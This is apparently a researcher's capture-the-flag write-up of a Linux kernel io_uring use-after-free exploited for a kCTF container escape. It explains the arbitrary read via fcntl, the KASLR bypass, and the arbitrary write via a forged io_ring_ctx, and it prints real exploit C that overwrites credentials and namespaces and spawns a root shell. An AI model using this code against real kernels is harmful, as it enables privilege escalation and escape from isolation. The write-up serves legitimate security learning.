I won’t go into the bug very much because it wasn’t really important to the exercise of being creative and writing a new kind of exploit (new for me); however, as you can tell from the patch, there was a call to put (decrease) a reference to a file without first checking if the file was a fixed file in the io_uring. There is this concept of fixed files which are managed by the io_uring itself, and there was this pattern throughout that codebase of doing checks on request files before putting them to ensure that they were not fixed files, and in this instance you can see that the check was not performed. So we are able from userspace to open a file (refcount == 1), register the file as a fixed file (refcount == 2), call into the buggy code path by submitting an IORING_OP_MSG_RING request which, upon completion, will erroneously decrement the refcount (refcount == 1), and then finally, call io_uring_unregister_files which ends up decrementing the refcount to 0 and freeing the file while we still maintain an open file descriptor for it. This is about as good as bugs get. I need to find one of these.
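
The refcount sequence above is easier to see as a tiny state machine. This is purely a toy model written for illustration, not kernel code: the FileModel type and its methods are made up, and it only tracks the count, whether the object has been freed, and whether userspace still holds a descriptor.

```rust
// Toy model of the reference count on a `struct file`
#[derive(Debug)]
struct FileModel {
    refcount: u32,
    freed: bool,
    fd_open: bool,
}

impl FileModel {
    // open(): userspace gets an fd and the file starts with one reference
    fn open() -> Self {
        FileModel { refcount: 1, freed: false, fd_open: true }
    }

    // Take a reference
    fn get(&mut self) {
        self.refcount += 1;
    }

    // Drop a reference, freeing the object when the count reaches zero
    fn put(&mut self) {
        self.refcount -= 1;
        if self.refcount == 0 {
            self.freed = true;
        }
    }
}

// Replay the four steps and record the refcount after each one
fn replay_bug() -> (Vec<u32>, FileModel) {
    let mut file = FileModel::open();
    let mut trace = vec![file.refcount];

    file.get(); // register as a fixed file
    trace.push(file.refcount);

    file.put(); // IORING_OP_MSG_RING completion: put without the fixed check
    trace.push(file.refcount);

    file.put(); // io_uring_unregister_files drops what it thinks is its ref
    trace.push(file.refcount);

    (trace, file)
}
```

The trace comes out as 1, 2, 1, 0, and the model ends with freed and fd_open both true, which is exactly the dangling descriptor the rest of the exploit builds on.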

What sort of variant analysis can we perform on this type of bug? I’m not so sure, it seems to be a broad category. But the careful code reviewer might have noticed that everywhere else in the codebase when there was the potential of putting a request file, the authors made sure to check if the file was fixed or not. This file put forgot to perform the check. The broad lesson I learned from this was to try and find instances of an action being performed multiple times in a codebase and look for discrepancies between those routines.

Giant Shoulders

It’s extremely important to stress that the blogpost I linked above from @pqlpql and @Awarau1 was very instrumental to this process. In that blogpost they broke down in exquisite detail how to coerce the Linux kernel to free an entire page of file objects back to the page allocator by utilizing a technique called “cross-cache”. file structs have their own dedicated cache in the kernel and so typical object replacement shenanigans in UAF situations aren’t very useful in this instance, regardless of the struct file size. Thanks to their blogpost, the concept of “cross-cache” has been used and discussed more and more, at least on Twitter from my anecdotal experience.

Instead of using this trick of getting our entire victim page of file objects sent back to the page allocator only to have the page used as the backing for general cache objects, I elected to have the page reallocated in the form of a pipe buffer. Please see this blogpost by @pqlpql for more information (this is a great writeup in general). This is an extremely powerful technique because we control all of the contents of the pipe buffer (via writes) and we can read 100% of the page contents (via reads). It’s also extremely reliable in my experience. I’m not going to go into too much depth here because this wasn’t any of my doing, this is 100% the people mentioned thus far. Please go read the material from them.

Arbitrary Read

The first thing I started to look for, was a way to leak data, because I’ve been hardwired to think that all Linux kernel exploits follow the same pattern of achieving a leak which defeats KASLR, finding some valuable objects in memory, overwriting a function pointer blah blah blah. (Turns out this is not the case and some really talented people have really opened my mind in this area.) The only thing I knew for certain at this point was I have an open file descriptor at my disposal so let’s go looking around the file system code in the Linux kernel. One of the first things that caught my eye was the fcntl syscall in fs/fcntl.c. In general what I was doing at this point, was going through syscall tables for the Linux kernel and seeing which syscalls took an fd as an argument. From there, I would visit the portion of the kernel codebase which handled that syscall implementation and I would ctrl-f for the function copy_to_user. This seemed like a relatively logical way to find a method of leaking data back to userspace.

The copy_to_user function is a key part of the Linux kernel’s interface with user space. It’s used to copy data from the kernel’s own memory space into the memory space of a user process. This function ensures that the copy is done safely, respecting the separation between user and kernel memory.

Now if you go to the source code and do the find on copy_to_user, the 2nd result is a snippet in this bit right here:

static long fcntl_rw_hint(struct file *file, unsigned int cmd,
			  unsigned long arg)
{
	struct inode *inode = file_inode(file);
	u64 __user *argp = (u64 __user *)arg;
	enum rw_hint hint;
	u64 h;

	switch (cmd) {
	case F_GET_RW_HINT:
		h = inode->i_write_hint;
		if (copy_to_user(argp, &h, sizeof(*argp)))
			return -EFAULT;
		return 0;
	case F_SET_RW_HINT:
		if (copy_from_user(&h, argp, sizeof(h)))
			return -EFAULT;
		hint = (enum rw_hint) h;
		if (!rw_hint_valid(hint))
			return -EINVAL;

		inode_lock(inode);
		inode->i_write_hint = hint;
		inode_unlock(inode);
		return 0;
	default:
		return -EINVAL;
	}
}

You can see that in the F_GET_RW_HINT case, a u64 (“h”), is copied back to userspace. That value comes from the value of inode->i_write_hint. And inode itself is returned from file_inode(file). The source code for that function is as follows:

static inline struct inode *file_inode(const struct file *f)
{
	return f->f_inode;
}

Lol, well then. If we control the file, then we control the inode as well. A struct file looks like this:

struct file {
	union {
		struct llist_node	fu_llist;
		struct rcu_head 	fu_rcuhead;
	} f_u;
	struct path		f_path;
	struct inode		*f_inode;	/* cached value */
<SNIP>

And since we’re using the pipe buffer as our replacement object (really the entire page), we can set inode to be an arbitrary address. Let’s go check out the inode struct and see what we can learn about this i_write_hint member.

struct inode {
	umode_t			i_mode;
	unsigned short		i_opflags;
	kuid_t			i_uid;
	kgid_t			i_gid;
	unsigned int		i_flags;

#ifdef CONFIG_FS_POSIX_ACL
	struct posix_acl	*i_acl;
	struct posix_acl	*i_default_acl;
#endif

	const struct inode_operations	*i_op;
	struct super_block	*i_sb;
	struct address_space	*i_mapping;

#ifdef CONFIG_SECURITY
	void			*i_security;
#endif

	/* Stat data, not accessed from path walking */
	unsigned long		i_ino;
	/*
	 * Filesystems may only read i_nlink directly.  They shall use the
	 * following functions for modification:
	 *
	 *    (set|clear|inc|drop)_nlink
	 *    inode_(inc|dec)_link_count
	 */
	union {
		const unsigned int i_nlink;
		unsigned int __i_nlink;
	};
	dev_t			i_rdev;
	loff_t			i_size;
	struct timespec64	i_atime;
	struct timespec64	i_mtime;
	struct timespec64	i_ctime;
	spinlock_t		i_lock;	/* i_blocks, i_bytes, maybe i_size */
	unsigned short          i_bytes;
	u8			i_blkbits;
	u8			i_write_hint;
<SNIP>

So i_write_hint is a u8, aka, a single byte. This is perfect for what we need, inode becomes the address from which we read a byte back to userland (plus the offset to the member).

Since we control 100% of the backing data of the file, we thus control the value of the inode member. So if we set up a fake file struct in memory via our pipe buffer and have the inode member be 0x1337, the kernel will try to deref 0x1337 as an address and then read a byte at the offset of the i_write_hint member. So this is an arbitrary read for us, and we found it in the dumbest way possible.
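
Here is a userspace simulation of that read primitive, just to make the pointer arithmetic concrete. Nothing in it touches a real kernel: FakeKernel is a byte array standing in for kernel memory, get_rw_hint mimics what the F_GET_RW_HINT path does with a file we control, and the offsets are assumptions. F_INODE_OFF is derived from the struct snippet above for a 64-bit build (a 16-byte union followed by a 16-byte struct path), while I_WRITE_HINT_OFF and FAKE_FILE_SIZE are hypothetical placeholders, since the real values depend on kernel version and config. The trick is that to read the byte at some target address, we set the fake f_inode to the target minus the i_write_hint offset.

```rust
// Assumption: offset of `f_inode` for the 64-bit layout shown above
const F_INODE_OFF: usize = 0x20;
// Hypothetical placeholder, the real offset depends on version and config
const I_WRITE_HINT_OFF: u64 = 0x8f;
// Hypothetical size for the fake object we spray via the pipe buffer
const FAKE_FILE_SIZE: usize = 0x100;

// A byte array standing in for a window of kernel memory
struct FakeKernel {
    base: u64,
    mem: Vec<u8>,
}

impl FakeKernel {
    // Models the F_GET_RW_HINT path: deref file->f_inode, then return the
    // single byte at the `i_write_hint` offset
    fn get_rw_hint(&self, file: &[u8]) -> u8 {
        let mut ptr = [0u8; 8];
        ptr.copy_from_slice(&file[F_INODE_OFF..F_INODE_OFF + 8]);
        let inode = u64::from_le_bytes(ptr);
        let addr = inode.wrapping_add(I_WRITE_HINT_OFF);
        self.mem[(addr - self.base) as usize]
    }
}

// Craft fake `struct file` contents so the hint read lands on `target`
fn fake_file_for(target: u64) -> Vec<u8> {
    let mut file = vec![0u8; FAKE_FILE_SIZE];
    let inode = target.wrapping_sub(I_WRITE_HINT_OFF);
    file[F_INODE_OFF..F_INODE_OFF + 8].copy_from_slice(&inode.to_le_bytes());
    file
}

// Leak eight consecutive bytes, one fake file per byte, and reassemble them
fn read_u64(kernel: &FakeKernel, addr: u64) -> u64 {
    let mut out = [0u8; 8];
    for (i, byte) in out.iter_mut().enumerate() {
        *byte = kernel.get_rw_hint(&fake_file_for(addr + i as u64));
    }
    u64::from_le_bytes(out)
}
```

Because each call only returns one byte, leaking a full pointer takes eight rounds of rewriting the fake file and calling the primitive again.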

This was really encouraging for me that we found an arbitrary read gadget so quickly, but what should we aim the read at?

Finding a Read Target

So we can read data at any address we want, but we don’t know what to read. I struggled thinking about this for a while, but then remembered that the cpu_entry_area was not randomized boot to boot, it is always at the same address. I knew this from the above blogpost about the file UAF, but also vaguely from @ky1ebot tweets like this one.

cpu_entry_area is a special per-CPU area in the kernel that is used to handle some types of interrupts and exceptions. There is this concept of Interrupt Stacks in the kernel that can be used in the event that an exception must be handled for instance.

After doing some debugging with GDB, I noticed that there was at least one kernel text pointer that showed up in the cpu_entry_area consistently and that was an address inside the error_entry function which is as follows:

SYM_CODE_START_LOCAL(error_entry)
	UNWIND_HINT_FUNC

	PUSH_AND_CLEAR_REGS save_ret=1
	ENCODE_FRAME_POINTER 8

	testb	$3, CS+8(%rsp)
	jz	.Lerror_kernelspace

	/*
	 * We entered from user mode or we're pretending to have entered
	 * from user mode due to an IRET fault.
	 */
	swapgs
	FENCE_SWAPGS_USER_ENTRY
	/* We have user CR3.  Change to kernel CR3. */
	SWITCH_TO_KERNEL_CR3 scratch_reg=%rax
	IBRS_ENTER
	UNTRAIN_RET

	leaq	8(%rsp), %rdi			/* arg0 = pt_regs pointer */
.Lerror_entry_from_usermode_after_swapgs:

	/* Put us onto the real thread stack. */
	call	sync_regs
	RET
<SNIP>

error_entry seemed to be used as an entry point for handling various exceptions and interrupts, so it made sense to me that an address inside the function might be found on what I was guessing was an interrupt stack in the cpu_entry_area. The address pointed at the call sync_regs portion of the function. I was never able to confirm which common exceptions or interrupts on the system were pushing that address onto the stack, presumably when the call was executed, so maybe someone can chime in and correct me if I’m wrong about this portion of the exploit. It made sense to me at least, and the address showed up in the cpu_entry_area so reliably that it was never absent during my testing. Armed with a kernel text address at a known offset, we could now defeat KASLR with our arbitrary read. At this point we have the read, the read target, and KASLR defeated.

Again, this portion didn’t take very long to figure out because I had just been introduced to cpu_entry_area by the aforementioned blogposts at the time.
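The KASLR arithmetic itself is just a subtraction. Here is a small sketch, assuming the build-specific EE_OFF constant from the exploit listing (the distance from the leaked error_entry pointer to the kernel base). The helper names kernel_base_from_leak and plausible_kernel_base are hypothetical, and the plausibility check is an illustrative extra rather than something the exploit relies on.

```c
#include <assert.h>
#include <stdint.h>

/* Build-specific: offset from the leaked error_entry pointer to the kernel
 * base, as defined in the exploit listing. Other kernels will differ. */
#define EE_OFF 0xe0124dULL

/* Start of the x86-64 kernel text mapping region */
#define KERNEL_TEXT_MIN 0xffffffff80000000ULL

/* Recover the kernel base from the pointer read out of cpu_entry_area */
uint64_t kernel_base_from_leak(uint64_t leaked_ptr)
{
    assert(leaked_ptr >= EE_OFF);
    return leaked_ptr - EE_OFF;
}

/* Cheap sanity check: the base should sit in the kernel text mapping
 * and be at least page aligned. Returns 1 if plausible, 0 otherwise. */
int plausible_kernel_base(uint64_t base)
{
    return base >= KERNEL_TEXT_MIN && (base & 0xFFFULL) == 0;
}
```

For example, a leaked value of 0xffffffff81e0124d gives a base of 0xffffffff81000000, which is the default base when the kernel is not slid at all.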

Where are the Write Gadgets?

I actually struggled to find a satisfactory write gadget for a few days. I was kind of spoiled by my experience finding my arbitrary read gadget and thought this would be a similarly easy search. I followed roughly the same process of going through syscalls which took an fd as an argument and tracing through them looking for calls to copy_to_user, but I didn’t have the same luck. During this time, I was discussing the topic with my very talented friend @Firzen14 and he brought up this concept here: https://googleprojectzero.blogspot.com/2022/11/a-very-powerful-clipboard-samsung-in-the-wild-exploit-chain.html#h.yfq0poarwpr9. In the P0 blogpost, they talk about how the signalfd_ctx of a signalfd file is stored in the f.file->private_data field and how the signalfd syscall allows the attacker to perform a write of the ctx->sigmask. So in our situation, since we control the entire fake file contents, forging a fake signalfd_ctx in memory would be quite easy since we have access to an entire page of memory.

I couldn’t use this technique for my personally imposed challenge though since the technique was already published. But this did open my eyes to the concept of storing contexts and objects in the private_data field of our struct file. So at this point, I went hunting for usages of private_data in the kernel code base. As you can see, the member is used in many many places: https://elixir.bootlin.com/linux/latest/C/ident/private_data.

This was very encouraging to me since I was bound to find some way to achieve an arbitrary write with so many instances of the member being used in so many different code paths; however, I still struggled a while finding a suitable gadget. Finally, I decided to look back at io_uring itself.

Looking for instances where file->private_data was used, I quickly found one right in the very function that was related to the bug. In io_msg_ring, you can see that a target_ctx of type io_ring_ctx is derived from req->file->private_data. Since we control the fake file, we can control the private_data contents (a pointer to a fake io_ring_ctx in this case).

io_msg_ring is used to pass data from one io ring to another, and you can see that in io_fill_cqe_aux, we actually retrieve an io_uring_cqe struct from our potentially faked io_ring_ctx via io_get_cqe. Immediately, we see several WRITE_ONCE macros used to write data to this object. This was looking extremely promising. I initially was going to use this write as my gadget, but as you will see later, the write sequences and the offsets at which they occur didn’t really fit my exploitation plan. So for now, we’ll find a second write in the same code path.

Immediately after the call to io_fill_cqe_aux, there is one to io_commit_cqring using our faked io_ring_ctx:

static inline void io_commit_cqring(struct io_ring_ctx *ctx)
{
	/* order cqe stores with ring update */
	smp_store_release(&ctx->rings->cq.tail, ctx->cached_cq_tail);
}

This is basically a memcpy: we write the contents of ctx->cached_cq_tail (100% user-controlled) to &ctx->rings->cq.tail (100% user-controlled). The size of the write in this case is 4 bytes. So we have achieved an arbitrary 4-byte write. From here, it just boils down to what type of exploit you want to write, so I decided to do one I had never done in the spirit of my self-imposed challenge.
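The shape of this gadget can be sketched in userland with toy structures. The layouts below are simplified, hypothetical stand-ins that only keep the fields the gadget touches (the real io_ring_ctx and rings structures are much larger, and the exploit uses an offset of 0xc0 for cq.tail), and sim_write4 is an illustrative helper name.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Toy layouts: only the fields io_commit_cqring touches are modelled */
struct sim_ring  { uint32_t head; uint32_t tail; };
struct sim_rings { struct sim_ring sq; struct sim_ring cq; };
struct sim_ctx   { struct sim_rings *rings; uint32_t cached_cq_tail; };

/* Mirrors the store in io_commit_cqring (without the release semantics) */
void sim_commit_cqring(struct sim_ctx *ctx)
{
    ctx->rings->cq.tail = ctx->cached_cq_tail;
}

/* Turn the store into a 4-byte write-what-where: aim ctx->rings so that
 * &ctx->rings->cq.tail == where, and put `what` in cached_cq_tail. */
void sim_write4(struct sim_ctx *fake_ctx, uint32_t what, uint32_t *where)
{
    assert(fake_ctx != NULL && where != NULL);

    fake_ctx->rings = (struct sim_rings *)
        ((uintptr_t)where - offsetof(struct sim_rings, cq.tail));
    fake_ctx->cached_cq_tail = what;

    sim_commit_cqring(fake_ctx);
}
```

The only trick is the subtraction: the rings pointer is set to the target address minus the offset of cq.tail, which is the same adjustment the exploit makes with its where - 0xc0.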

Exploitation Plan

Now that we have all the possible tools we could need, it was time to start crafting an exploitation plan. In the kCTF environment you are running as an unprivileged user inside of a container, and your goal is to escape the container and read the flag value from the host file system.

I honestly had no idea where to start in this regard, but luckily there are some good articles out there explaining the situation. This post from Cyberark was extremely helpful in understanding how containerization of a task is achieved in the kernel. And I also got some very helpful pointers from Andy Nguyen’s blog post on his kCTF exploit. Huge thanks to Andy for being one of the few to actually detail their steps for escaping the container.

Finding Init

At this point, my goal is to find the host Init task_struct in memory and find the value of a few important members: real_cred, cred, and nsproxy. real_cred is used to track the user and group IDs that were originally responsible for creating the process and unlike cred, real_cred remains constant and does not change due to things like setuid. cred is used to convey the “effective” credentials of a task, like the effective user ID for instance. Finally, and super importantly because we are trapped in a container, nsproxy is a pointer to a struct that contains all of the information about our task’s namespaces like network, mount, IPC, etc. All of these members are pointers, so if we are able to find their values via our arbitrary read, we should then be able to overwrite our own credentials and namespace in our task_struct. Luckily, the address of the init task is a constant offset from the kernel base, so once we broke KASLR with our read of the error_entry address, we can then copy those values with our arbitrary read capability since they would reside at known addresses (offsets from the init task symbol).
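Put as code, the address bookkeeping looks roughly like this. The offsets are the build-specific values from the exploit listing, while struct task_targets and the helper names are hypothetical and introduced only for illustration.

```c
#include <assert.h>
#include <stdint.h>

/* Build-specific offsets from the exploit listing; other kernels differ */
#define INIT_OFF      0x18149c0ULL /* kernel base -> init_task        */
#define REAL_CRED_OFF 0x720ULL     /* task_struct -> real_cred        */
#define CRED_OFF      0x728ULL     /* task_struct -> cred             */
#define NSPROXY_OFF   0x780ULL     /* task_struct -> nsproxy          */

/* Addresses of the three pointer members we care about in one task */
struct task_targets {
    uint64_t real_cred;
    uint64_t cred;
    uint64_t nsproxy;
};

/* init_task lives at a constant offset from the (de-randomized) base */
uint64_t init_task_addr(uint64_t kern_base)
{
    assert(kern_base != 0);
    return kern_base + INIT_OFF;
}

/* Where to read (for init) or write (for our child) each member */
struct task_targets member_addrs(uint64_t task)
{
    struct task_targets t;

    t.real_cred = task + REAL_CRED_OFF;
    t.cred      = task + CRED_OFF;
    t.nsproxy   = task + NSPROXY_OFF;
    return t;
}
```

The same member_addrs calculation serves both sides: applied to init_task it gives the addresses to read the values from, and applied to the child task it gives the addresses to overwrite.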

Forging Objects

With those values in hand, we now need to find our own task_struct in memory so that we can overwrite our members with those of init. To do this, I took advantage of the fact that the task_struct has a linked list of tasks on the system. Early in the exploit, I spawn a child process with a known name that fits within the task_struct comm field. Then, as I traverse the linked list of tasks on the system, I simply check each task’s comm field for my easily identifiable child process. You can see how I do that in this code snippet:

void traverse_tasks(void)
{    
    // Process name buf
    char current_comm[16] = { 0 };

    // Get the next task after init
    uint64_t current_next = read_8_at(g_init_task + TASKS_NEXT_OFF);
    uint64_t current = current_next - TASKS_NEXT_OFF;

    if (!task_valid(current))
    { 
        err("Invalid task after init: 0x%lx", current);    
    }

    // Read the comm
    read_comm_at(current + COMM_OFF, current_comm);
    //printf("    - Address: 0x%lx, Name: '%s'\n", current, current_comm);

    // While we don't have NULL, traverse the list
    while (task_valid(current))
    {
        current_next = read_8_at(current_next);
        current = current_next - TASKS_NEXT_OFF;

        if (current == g_init_task) { break; }

        // Read the comm
        read_comm_at(current + COMM_OFF, current_comm);
        //printf("    - Address: 0x%lx, Name: '%s'\n", current, current_comm);

        // If we find the target comm, save it
        if (!strcmp(current_comm, TARGET_TASK))
        {
            g_target_task = current;
        }

        // If we find our target comm, save it
        if (!strcmp(current_comm, OUR_TASK))
        {
            g_our_task = current;
        }
    }
}

You can also see that not only did we find our target task, we also found our own task in memory. This is important for the way I chose to exploit this bug because, remember, we need to fake a few objects in memory, like the io_ring_ctx for instance. Usually this is done by crafting objects in the kernel heap and somehow discovering their address with a leak. In my case, I have a whole pipe buffer, which is 4096 bytes of memory, to utilize. The only problem is, I have no idea where it is. But I do know that I have an open file descriptor to it, and I know that each task has a file descriptor table inside of its files member. After some time spent printk-ing offsets, I was able to traverse my own task’s file descriptor table and learn the address of my pipe buffer. This works because the pipe buffer page is page aligned, so I can just page align the address of our UAF file that we read from the file descriptor table. So now I know exactly where in memory my pipe buffer is, and I also know at what offset on that page our UAF struct file resides. I have a small helper function to set a “scratch space” region address as a global and then use that memory to set up our fake io_ring_ctx. You can see those functions here, first finding our pipe buffer address:

void find_pipe_buf_addr(void)
{
    // Get the base of the files array
    uint64_t files_ptr = read_8_at(g_file_array);
    
    // Adjust the files_ptr to point to our fd in the array
    files_ptr += (sizeof(uint64_t) * g_uaf_fd);

    // Get the address of our UAF file struct
    uint64_t curr_file = read_8_at(files_ptr);

    // Calculate the offset
    g_off = curr_file & 0xFFF;

    // Set the globals
    g_file_addr = curr_file;
    g_pipe_buf = g_file_addr - g_off;

    return;
}

And then determining the location of our scratch space where we will forge the fake io_ring_ctx:

// Here, all we're doing is determining what side of the page the UAF file is
// on. If it's on the front half of the page, the back half is our scratch
// space, and vice versa
void set_scratch_space(void)
{
    g_scratch = g_pipe_buf;
    if (g_off < 0x500) { g_scratch += 0x500; }
}
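The page arithmetic from these two helpers can be checked in isolation. The sketch below restates it in userland under a few assumptions taken from the listing: 16 filp slots of 0x100 bytes per 4096-byte page, and a fake ctx whose highest written field is at scratch + 0x268 (8 bytes wide), so it spans 0x270 bytes. struct page_layout and the function names are hypothetical.

```c
#include <assert.h>
#include <stdint.h>

#define PAGE_BYTES    0x1000ULL
#define FILP_SIZE     0x100ULL /* 16 filp objects per page, per the listing */
#define SCRATCH_SHIFT 0x500ULL /* same constant as set_scratch_space()      */
#define CTX_SPAN      0x270ULL /* highest fake ctx field: 0x268 + 8 bytes   */

struct page_layout {
    uint64_t page;    /* base of the pipe buffer page            */
    uint64_t off;     /* offset of the UAF file on that page     */
    uint64_t scratch; /* where the fake ctx will be forged       */
};

/* Same math as find_pipe_buf_addr() followed by set_scratch_space() */
struct page_layout layout_from_file_addr(uint64_t file_addr)
{
    struct page_layout l;

    l.off = file_addr & (PAGE_BYTES - 1);
    l.page = file_addr - l.off;
    l.scratch = l.page;
    if (l.off < SCRATCH_SHIFT) { l.scratch += SCRATCH_SHIFT; }

    /* The forged ctx must stay inside the page we control */
    assert(l.scratch + CTX_SPAN <= l.page + PAGE_BYTES);
    return l;
}

/* Returns 1 if the fake file and the fake ctx would collide, else 0 */
int regions_overlap(const struct page_layout *l)
{
    uint64_t file_lo = l->page + l->off;
    uint64_t file_hi = file_lo + FILP_SIZE;
    uint64_t scr_lo = l->scratch;
    uint64_t scr_hi = scr_lo + CTX_SPAN;

    return file_lo < scr_hi && scr_lo < file_hi;
}
```

Running this for every one of the 16 possible slots shows that the fake file and the scratch region never collide under these assumptions, which is the property the 0x500 split is there to guarantee.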

Now we have one more read to do, and this is really just to make the exploit easier. In order to avoid a lot of debugging while triggering my write, I need to make sure that my fake io_ring_ctx contains as many valid fields as necessary. If you start with a completely NULL object, you will have to troubleshoot every NULL-deref kernel panic and determine where you went wrong and what kind of value that member should have had. Instead, I chose to read a legitimate instance of a real object and copy its contents to a global buffer. Working now from a good base, our forged object can then be set up properly to perform our arbitrary write. You can see me using the copy and updating the necessary fields here:

void write_setup_ctx(char *buf, uint32_t what, uint64_t where)
{
    // Copy our copied real ring fd 
    memcpy(&buf[g_off], g_ring_copy, 256);

    // Set f->f_count to 1 
    uint64_t *count = (uint64_t *)&buf[g_off + 0x38];
    *count = 1;

    // Set f->private_data to our scratch space
    uint64_t *private_data = (uint64_t *)&buf[g_off + 0xc8];
    *private_data = g_scratch;

    // Set ctx->cqe_cached
    size_t cqe_cached = g_scratch + 0x240;
    cqe_cached &= 0xFFF;
    uint64_t *cached_ptr = (uint64_t *)&buf[cqe_cached];
    *cached_ptr = NULL_MEM;

    // Set ctx->cqe_sentinel
    size_t cqe_sentinel = g_scratch + 0x248;
    cqe_sentinel &= 0xFFF;
    uint64_t *sentinel_ptr = (uint64_t *)&buf[cqe_sentinel];

    // We need ctx->cqe_cached < ctx->cqe_sentinel
    *sentinel_ptr = NULL_MEM + 1;

    // Set ctx->rings so that ctx->rings->cq.tail is written to. That is at 
    // offset 0xc0 from cq base address
    size_t rings = g_scratch + 0x10;
    rings &= 0xFFF;
    uint64_t *rings_ptr = (uint64_t *)&buf[rings];
    *rings_ptr = where - 0xc0;

    // Set ctx->cached_cq_tail which is our what
    size_t cq_tail = g_scratch + 0x250;
    cq_tail &= 0xFFF;
    uint32_t *cq_tail_ptr = (uint32_t *)&buf[cq_tail];
    *cq_tail_ptr = what;

    // Set ctx->cq_wait the list head to itself (so that it's "empty")
    size_t real_cq_wait = g_scratch + 0x268;
    size_t cq_wait = (real_cq_wait & 0xFFF);
    uint64_t *cq_wait_ptr = (uint64_t *)&buf[cq_wait];
    *cq_wait_ptr = real_cq_wait;
}

Performing Our Writes

Now, it’s time to do our writes. Remember those three sequential writes we were going to use inside of io_fill_cqe_aux, but I said they wouldn’t work with the exploit plan? Well the reason was, those three writes were as follows:

cqe = io_get_cqe(ctx);
	if (likely(cqe)) {
		WRITE_ONCE(cqe->user_data, user_data);
		WRITE_ONCE(cqe->res, res);
		WRITE_ONCE(cqe->flags, cflags);

They worked really well until I went to overwrite the target nsproxy member of our target child task_struct. One of those writes inevitably overwrote the members right next to nsproxy: signal and sighand. This caused big problems for me because as interrupts occurred, those members (pointers) would be deref’d and cause the kernel to panic since they were invalid values. So I opted to just use the 4-byte write inside io_commit_cqring instead. The 4-byte write also caused problems: at some points current has its creds checked, and with what basically amounted to a torn 8-byte write, we would leave current’s cred values in invalid states during these checks. This is why I had to use a child process. Huge shoutout to @pqlpql for tipping me off to this.
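The torn-write problem is easy to see in a userland sketch. Here sim_write4 is a hypothetical stand-in for the 4-byte kernel write, and the code assumes a little-endian machine such as x86-64, where the low half of a 64-bit value sits at the lower address.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

/* Hypothetical stand-in for the 4-byte write primitive */
void sim_write4(uint32_t what, void *where)
{
    assert(where != NULL);
    memcpy(where, &what, sizeof(what));
}

/* Overwrite an 8-byte pointer with two 4-byte writes and return the value
 * that is visible in between them. Assumes little-endian layout. */
uint64_t write8_in_halves(uint64_t what, uint64_t *where)
{
    uint64_t torn;

    /* First write: low 32 bits land at the lower address */
    sim_write4((uint32_t)(what & 0xFFFFFFFFULL), where);

    /* Anything reading the pointer right now sees half old, half new */
    torn = *where;

    /* Second write: high 32 bits complete the pointer */
    sim_write4((uint32_t)(what >> 32), (unsigned char *)where + 4);
    return torn;
}
```

With an old value of 0xffff888011112222 and a new value of 0xffff999933334444, the intermediate state is 0xffff888033334444, which is neither pointer. If the kernel dereferences a cred pointer in that window, it is working with garbage, which is why the writes target a sleeping child rather than the task doing the writing.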

Now we can just use those same steps to overwrite the three members real_cred, cred, and nsproxy, and now our child has all of the same privileges and capabilities that init does, including visibility into the host root file system. This is perfect, but I still wasn’t able to get the flag!

I started to panic at this point that I had seriously done something wrong. The exploit is FULL of paranoid checks: I reread every overwritten value to make sure it’s correct, for instance, so I was confident that I had done the writes properly. It felt like my namespace was somehow not effective yet in the child process, like it was cached somewhere. But then I remembered that in Andy Nguyen’s blog post, he used his root privileges to explicitly set his namespace values with calls to setns. Once I added this step, the child was able to see the root file system and find the flag. Instead of giving my child the same namespaces as init, I was able to give it the same namespaces of itself lol. I still haven’t followed through on this to determine how setns is implemented, but this could probably be done without explicit setns calls and only with our read and write tools:

// Our child waits to be given super powers and then drops into shell
void child_exec(void)
{
    // Change our taskname 
    if (prctl(PR_SET_NAME, TARGET_TASK, NULL, NULL, NULL) != 0)
    {
        err("`prctl()` failed");
    }

    while (1)
    {
        if (*(int *)g_shmem == 0x1337)
        {
            sleep(3);
            info("Child dropping into root shell...");
            if (setns(open("/proc/self/ns/mnt", O_RDONLY), 0) == -1) { err("`setns()`"); }
            if (setns(open("/proc/self/ns/pid", O_RDONLY), 0) == -1) { err("`setns()`"); }
            if (setns(open("/proc/self/ns/net", O_RDONLY), 0) == -1) { err("`setns()`"); }
            char *args[] = {"/bin/sh", NULL, NULL};
            execve(args[0], args, NULL);
        }

        else { sleep(2); }
    }
}

And finally I was able to drop into a root shell and capture the flag, escaping the container. One huge obstacle when I tried using my exploit on the Google infrastructure was that their kernel was compiled with SELinux support and my test environment was not. This ended up not being a big deal, I had some out of band confirmation/paranoia checks I had to leave out but fortunately the arbitrary read we used isn’t actually hooked in any way by SELinux unlike most of the other fcntl syscall flags. At that point remember, we don’t know enough information to fake any objects in memory so I’d be dead in the water if that read method was ruined by SELinux.

Conclusion

This was a lot of fun for me and I was able to learn a lot. I think these types of learning challenges are great and low-stakes. They can be fun to work on with friends as well, big thanks to everyone mentioned already and also @chompie1337 who had to listen to me freak out about not being able to read the flag once I had overwritten my creds. The exploit is posted below in full, let me know if you have any trouble understanding any of it, thanks.

// Compile
// gcc sploit.c -o sploit -l:liburing.a -static -Wall

#define _GNU_SOURCE
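#include <errno.h>
#include <fcntl.h>
#include <sched.h>
#include <stdarg.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/mman.h>
#include <sys/prctl.h>
#include <sys/resource.h>
#include <sys/types.h>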

#include "liburing.h"

// /sys/kernel/slab/filp/objs_per_slab
#define OBJS_PER_SLAB 16UL
// /sys/kernel/slab/filp/cpu_partial
#define CPU_PARTIAL 52UL
// Multiplier for cross-cache arithmetic
#define OVERFLOW_FACTOR 2UL
// Largest number of objects we could allocate per Cross-cache step
#define CROSS_CACHE_MAX 8192UL
// Fixed mapping in cpu_entry_area whose contents is NULL
#define NULL_MEM 0xfffffe0000002000UL
// Reading side of pipe
#define PIPE_READ 0
// Writing side of pipe
#define PIPE_WRITE 1
// error_entry inside cpu_entry_area pointer
#define ERROR_ENTRY_ADDR 0xfffffe0000002f48UL
// Offset from `error_entry` pointer to kernel base
#define EE_OFF 0xe0124dUL
// Kernel text signature
#define KERNEL_SIGNATURE 0x4801803f51258d48UL
// Offset from kernel base to init_task
#define INIT_OFF 0x18149c0UL
// Offset from task to task->comm
#define COMM_OFF 0x738UL
// Offset from task to task->real_cred
#define REAL_CRED_OFF 0x720UL
// Offset from task to task->cred
#define CRED_OFF 0x728UL
// Offset from task to task->nsproxy
#define NSPROXY_OFF 0x780UL
// Offset from task to task->files
#define FILES_OFF 0x770UL
// Offset from task->files to &task->files->fdt
#define FDT_OFF 0x20UL
// Offset from &task->files->fdt to &task->files->fdt->fd
#define FD_ARRAY_OFF 0x8UL
